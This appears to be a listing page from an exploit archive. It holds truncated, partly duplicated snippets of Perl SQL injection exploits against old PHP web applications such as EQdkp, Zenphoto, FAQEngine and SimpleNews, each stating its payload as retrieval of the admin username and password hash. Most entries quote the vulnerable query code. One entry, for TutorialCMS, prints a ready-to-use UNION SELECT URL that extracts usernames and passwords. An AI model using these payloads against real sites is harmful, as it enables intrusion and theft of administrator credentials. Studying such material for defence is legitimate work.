EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w EQdkp = 1.3.2 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code listmembers.php: $sql = 'SELECT m., m.memberearned-m.memberspent+m.memberadjustment AS...

Affiliate Directory - cat_id SQL Injection

Affiliate Directory - catid SQL Injection --==+================================================================================+==-- --==+ Affiliate Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8u...

zenphoto-sql.txt

!/usr/bin/perl -w Zenphoto 1.1.3 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code rss.php: $albumnr = $GETalbumnr; if $albumnr != "" $sql = "SELECT FROM ". prefix"images" ." WHERE albumid = $albumnr AND show = 1...

Fuzzylime Forum 1.0 - &#039;low.php?topic&#039; SQL Injection

!/usr/bin/perl -w Fuzzylime Forum 1.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code low.php: $gettopicid = mysqlquery"SELECT FROM $tableprefixthreads WHERE threadid='$GETtopic'"; PoC:...

Fuzzylime Forum 1.0 - low.php?topic SQL Injection

Fuzzylime Forum 1.0 - low.php?topic SQL Injection !/usr/bin/perl -w Fuzzylime Forum 1.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code low.php: $gettopicid = mysqlquery"SELECT FROM $tableprefixthreads WHERE...

comicsense02-sql.txt

!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...

Comicsense 0.2 - &#039;index.php?epi&#039; SQL Injection (2)

!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...

EQdkp &lt;= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w EQdkp = 1.3.2 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code listmembers.php: $sql = 'SELECT m., m.memberearned-m.memberspent+m.memberadjustment AS...

FAQEngine &lt;= 4.16.03 (question.php questionref) SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w FAQEngine = v4.16.03 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code question.php: $sql = "select from ".$tableprefix."questions where publish=1 and...

FAQEngine 4.16.03 - question.php?questionref SQL Injection

FAQEngine 4.16.03 - question.php?questionref SQL Injection !/usr/bin/perl -w FAQEngine = v4.16.03 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code question.php: $sql = "select from ".$tableprefix."questions where...

TutorialCMS <= 1.00 (search.php search) SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= TutorialCMS alert'http://www.w4ck1ng.com' PoC: http://victim.com/search.php?search=' UNION SELECT 0,0,0,0,username, password,0,0,0,0,0,0,0 FROM users WHERE id='1' / Subject To:...

SimpleNews <= 1.0.0 FINAL (print.php news_id) SQL Injection Exploit

Exploit for unknown platform in category web applications =================================================================== SimpleNews = 1.0.0 FINAL print.php newsid SQL Injection Exploit =================================================================== !/usr/bin/perl -w SimpleNews = 1.0.0...